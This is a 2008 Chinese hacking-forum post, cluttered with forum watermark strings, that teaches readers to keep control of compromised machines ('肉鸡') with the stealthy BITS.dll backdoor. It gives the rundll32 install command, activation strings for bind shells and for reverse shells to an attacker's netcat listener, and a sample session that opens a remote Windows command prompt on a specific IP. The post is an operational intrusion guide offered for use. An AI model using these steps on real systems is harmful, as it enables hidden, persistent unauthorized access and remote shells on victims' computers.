|
论坛元老
  
|
楼主
大 中
小 发表于 2008-6-24 13:40 只看该作者
用隐形后门来保护肉鸡
向大家介绍一种很好的后门技术DLL插入型后门.它的好处就是不会开放端口.不会在进程中出现.很多黑民们都会有疑问dll怎么实现后门的呢 .dll又不是exe程序可以启动怎么会有这么大的功能呢.答:因为dll后门不是靠自身启动的.大家应该知道exe程序在运行的时候可以调用dll文件..哪么程序员在写程序的时候只要在dll中修改一些变量就可以将dll绑定到一些系统的服务中启到后门的作用.下面我就介绍一个国内著名黑客小榕的dll后门作品bits.dll其实使用很简单 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站8 Q; ~# Z$ D% P2 f8 O
www.520diannao.com' y- E; X* p0 J# w2 a+ s
首先将bits.dll上传到肉鸡上使用administrator或者localsysytem进行
' j) V& ]" W% ]# i; ?电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站我爱电脑技术论坛7 X) X6 N8 y! p s. `/ N' C& E
安装 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站, u' @; M. c( H4 s0 L
% S. Y; e& ~! s. r+ L使用命令:rundll32.exe BITS.dll,Install <Active Strings>
, V( T+ ~, A- e$ Z( o. L* Y: l$ c' M电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
" p$ H/ ?* ]# g3 h打造最好的电脑自学交流论坛Active Strings是用户自己指定的一个特征字符串,用于激活BITS。
, K3 ?5 {' e. \0 F; z$ L电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站2 f( J, @1 A# ]# y+ U a3 M
安装成功后就可以进行联接了
* n) w1 H8 j, y6 y2 Y# M我爱电脑技术论坛; f4 y! M1 D- a" B" r
正向连接:
' @# O* n1 [4 G& J; F6 E我爱电脑技术社区--打造最好的电脑技术自学交流平台
, B) V- t9 v }. \0 V我爱电脑技术社区--打造最好的电脑技术自学交流平台1、用nc连接目标主机的任何一个TCP端口(80/139/445.....) ! P. ]+ K4 v/ g! ]; F7 S/ E
2、按照以下格式输入激活命令
! {5 ~' z2 m2 O- ]8 q0 g( Q<Active Strings>@dancewithdolphin[xell]:<PORT> 打造最好的电脑自学交流论坛: q% y7 @4 a t' O5 b
例如,在安装的时候设定了Active Strings为BITS Door,将CMD绑定在端口99: 打造最好的电脑自学交流论坛% _4 C& P6 ?3 \- o3 }1 [
BITS Door@dancewithdolphin[xell]:99 ! H1 N2 _1 u6 [3 S3 R5 l
: n$ c( V# g0 n/ u; A0 f打造最好的电脑自学交流论坛这样目标主机就会将CMD绑定在99。
5 b6 C. e1 U& S" X3 |& T @3、连接目标主机的指定端口(上例中为99) 我爱电脑技术论坛4 T7 V, `2 S; A. u& \
打造最好的电脑自学交流论坛; P; B" y8 {9 c8 U+ Y. v
1 U8 q, S+ I3 @+ N' n: v% k反向连接:
+ D* k, d$ p0 v$ \+ c, Kwww.520diannao.com
7 \# s/ Z2 X$ u0 \! Z: A" [电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站很多情况下主机是在防火墙后面的,这样就需要用反向连接。
/ |, w( v2 k+ O: T$ |( a我爱电脑技术社区--打造最好的电脑技术自学交流平台打造最好的电脑自学交流论坛+ B& ? n3 g2 V
1、在本地使用NC监听(如:nc -l -p 1234) 打造最好的电脑自学交流论坛. Q" @% R+ m! Q* R% _
2、用nc连接目标主机的任何一个防火墙允许的TCP端口(80/139/445.....) 我爱电脑技术社区--打造最好的电脑技术自学交流平台; N- _( ^& Z# F* G& |+ y
3、按照以下格式输入激活命令
- w6 v; e* C( E我爱电脑技术社区--打造最好的电脑技术自学交流平台<Active Strings>@dancewithdolphin[rxell]:<Your IP>:<Listen Port>
! o& @7 N, e5 N电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站例如,在安装的时候设定了Active Strings为BITS Door,本机地址为1.1.1.1, nc在1234 我爱电脑技术论坛$ u1 H" R2 d8 h G8 c @
端口监听: 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站& I2 W3 O S* W2 K d
BITS Door@dancewithdolphin[rxell]:1.1.1.1:1234 我爱电脑技术论坛) B. S: L7 e4 U
4、目标主机的CMD将会出现在NC监听的端口1234。
* l% V+ O) p! D* m% z7 zwww.520diannao.com
$ e5 o- ]" n; H1 ]2 k6 `4 m/ \- J我爱电脑技术社区--打造最好的电脑技术自学交流平台注意:所有的输入都区分大小写。
9 |6 d! a7 } Y* f电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
, x: g% f4 H% U3 p) k& _" K例:
1 P/ C$ r' O1 Q' Z( ?2 Z8 G1 |
6 q; z0 ^, O- d1 q3 Y* ?电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站C:\My Documents>nc 219.237.63.199 139 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站' b% o: C* {2 J2 m8 D1 ^3 Y2 j
securitystrings@dancewithdolphin[xell]:7
; S& q N, \0 N* s打造最好的电脑自学交流论坛?
: X, p8 \( } h) i. N# t我爱电脑技术论坛www.520diannao.com: R2 E7 r! K0 m
C:\My Documents>nc 219.237.63.199 7 我爱电脑技术社区--打造最好的电脑技术自学交流平台# C7 D. ?, t5 t: e
?Microsoft Windows 2000 [Version 5.00.2195]
' [! c q/ r$ N5 [* m0 @9 t4 O9 E+ {电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站(C) 版权所有 1985-2000 Microsoft Corp.
+ o0 T/ B: x2 d' r( E4 o我爱电脑技术论坛
. s9 E/ }$ L" S# ~5 u: R) H电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站C:\WINNT\system32>
" A# a1 A. d+ w+ U% L( \3 L打造最好的电脑自学交流论坛7 ^" g2 w/ F# a3 q
祝大家好运
% z( Y* }" ~2 x) dwww.520diannao.com1 r/ W# h8 ^* G2 K8 ?3 q# {
注:如果有什么地方写错了请高手们指出
|
